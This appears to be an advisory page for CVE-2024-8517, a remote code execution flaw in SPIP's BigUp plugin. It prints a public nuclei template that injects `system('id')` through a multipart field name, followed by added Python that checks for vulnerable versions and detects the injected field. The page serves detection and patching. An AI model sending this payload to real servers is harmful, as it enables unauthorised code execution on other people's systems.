CVE-2024-8517: SPIP BigUp Plugin - Remote Code Execution

Date: 2025-08-01 | Affected software: SPIP BigUp Plugin | PoC: public

Vulnerability description

SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.

PoC code [public]

id: CVE-2024-8517

info:
  name: SPIP BigUp Plugin - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
  reference:
    - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
    - https://vulncheck.com/advisories/spip-upload-rce
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8517
    cwe-id: CWE-646
    epss-score: 0.90372
    epss-percentile: 0.99584
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-1224668706
    fofa-query: "X-Spip-Cache"
  tags: cve,cve2024,intrusive,spip,rce

flow: http(1) && http(2)

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'formulaire_action_args'
          - 'spip'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: formulaire
        regex:
          - name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
        internal: true

  - raw:
      - |
        POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586

        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="page"

        spip_pass
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="lang"

        fr
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action"

        oubli
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_args"

        {{formulaire}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_sign"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="oubli"

        {{email}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="nobot"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="bigup_retrouver_fichiers"

        a
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --5f02b65945d644d6a32847ab130e9586--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022045dd3455f526033b7c74ccedbcfb7a1cd1e98dd0773c54b7f447d1e81833d24a022100ce6fbe0ddedd3e0ac0d770311a2a4bd478e4509298d5468114d96729e45f5279:922c64590222798bb761d5b6d8e72950
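Two checks a defender wants from this advisory are a branch-aware version test (the fix landed in three parallel branches, so "4.2.16" is patched while "4.3.1" is not) and a way to inspect multipart bodies for the kind of field name the PoC template sends, since the injection rides in the part's `name=` parameter rather than in the file content that most upload scanners look at. The Python below is an added example, not code from the page, from SPIP or from the nuclei project. The fixed versions are taken from the advisory text; the "safe field name" pattern is an assumption of this example (identifier plus optional PHP-style array brackets), the two request bodies are constructed samples, and the only page-derived value in them is the field name from the PoC template.

```python
import re
from typing import Dict, List, Optional

# Fixed releases per branch, taken from the advisory text:
# SPIP before 4.3.2, 4.2.16 and 4.1.18 is affected.
FIXED_RELEASES = {(4, 3): (4, 3, 2), (4, 2): (4, 2, 16), (4, 1): (4, 1, 18)}


def is_vulnerable_version(version: str) -> Optional[bool]:
    """True if this SPIP version precedes the fixed release of its branch,
    False if it is at or above it, and None for branches the advisory does
    not list (4.0.x, 3.x, 5.x ...), which need a manual check rather than
    an automatic 'not affected'."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        return None
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    branch = (major, minor)
    if branch not in FIXED_RELEASES:
        return None
    return (major, minor, patch) < FIXED_RELEASES[branch]


# Heuristic (assumption of this example, not an SPIP rule): an honest form
# field name is an identifier, optionally with PHP-style array brackets such
# as fichier[0]. Quotes, parentheses, dots or semicolons inside a name point
# at an attempt to break out of whatever string the name is interpolated into.
SAFE_FIELD_NAME = re.compile(r"^[A-Za-z0-9_\-]+(\[[A-Za-z0-9_\-]*\])*$")
NAME_PARAM = re.compile(r'(?:^|;\s*)name="([^"]*)"')   # not the filename= parameter


def parse_multipart(body: bytes, boundary: str) -> List[Dict]:
    """Minimal multipart/form-data splitter: one dict per part with lower-cased
    headers and raw data. Enough for inspection, not a full RFC 7578 parser."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.strip() in (b"", b"--"):          # preamble / closing delimiter
            continue
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("utf-8", "replace").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        parts.append({"headers": headers, "data": data.rstrip(b"\r\n")})
    return parts


def find_suspicious_parts(body: bytes, boundary: str) -> List[Dict]:
    """Flag parts whose field name is not a plain identifier. File parts are
    marked separately because this issue is reached through a file upload."""
    findings = []
    for part in parse_multipart(body, boundary):
        disposition = part["headers"].get("content-disposition", "")
        m = NAME_PARAM.search(disposition)
        name = m.group(1) if m else ""
        if not SAFE_FIELD_NAME.match(name):
            findings.append({
                "name": name,
                "file_part": 'filename="' in disposition,
                "reason": "field name contains characters outside [A-Za-z0-9_-] and []",
            })
    return findings


# --- constructed sample requests (not captured traffic) ----------------------
BOUNDARY = "5f02b65945d644d6a32847ab130e9586"      # same delimiter as the PoC template


def build_body(*parts) -> bytes:
    """Assemble a multipart/form-data body with CRLF line endings."""
    out = b""
    for headers, data in parts:
        out += b"--" + BOUNDARY.encode() + b"\r\n" + headers.encode() + b"\r\n\r\n" + data.encode() + b"\r\n"
    return out + b"--" + BOUNDARY.encode() + b"--\r\n"


BENIGN_BODY = build_body(
    ('Content-Disposition: form-data; name="page"', "spip_pass"),
    ('Content-Disposition: form-data; name="oubli"', "user@example.com"),
    ('Content-Disposition: form-data; name="fichier[0]"; filename="photo.jpg"\r\nContent-Type: image/jpeg', "..."),
)

# Field name copied from the PoC template; every other value here is made up.
MALICIOUS_BODY = build_body(
    ('Content-Disposition: form-data; name="page"', "spip_pass"),
    ('Content-Disposition: form-data; name="bigup_retrouver_fichiers"', "a"),
    ('Content-Disposition: form-data; name="RCE[\'.system(\'id\').die().\']"; filename="abc.txt"\r\nContent-Type: text/plain', "x"),
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, find_suspicious_parts(body, BOUNDARY))
    for v in ("4.3.1", "4.3.2", "4.2.16", "4.1.17", "5.0.0"):
        print(v, is_vulnerable_version(v))
```

The field-name check only helps where request bodies are actually visible: a plain access log records the URL (here a password-reset page, `spip_pass`) and nothing of the multipart payload, so it has to run in a WAF, reverse proxy or request-logging middleware. The version function deliberately returns None instead of False for branches the advisory does not name, so an unlisted (typically end-of-life) branch is escalated rather than silently marked clean.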
